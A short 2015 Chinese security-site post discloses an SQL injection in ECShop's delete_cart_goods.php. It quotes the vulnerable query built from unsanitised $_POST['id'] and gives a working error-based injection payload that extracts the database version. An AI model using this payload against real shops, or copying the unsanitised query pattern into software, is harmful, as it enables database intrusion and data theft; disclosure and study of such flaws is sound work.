欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

ecshop 注入一枚

来源:本站整理 作者:佚名 时间:2015-03-29 TAG: 我要投稿

 应该是古老的注入吧,新版的貌似都不存在有这个文件

文件
delete_cart_goods.php
源码

http://code.taobao.org/p/ecshop_modernshowmall/src/trunk/wwwroot/delete_cart_goods.php

if($_POST['id']) { $sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$_POST['id']; $GLOBALS['db']->query($sql); }

问题还是一样的。这里的$_POST[‘id’]直接带入了query($sql)

DELETE FROM `etshop`.`ecs_cart` WHERE rec_id=xxx Unknown column 'xxx' in 'where clause'

提示找不到xxx这个字段。那我们随便写一个存在的不就好了~
首先来测试数字型的

我们再测试下字符型的

随便赋予id值,都会带入sql语句
比如:

a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

完整的sql语句就变成了

DELETE FROM `etshop`.`ecs_cart` WHERE rec_id=a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载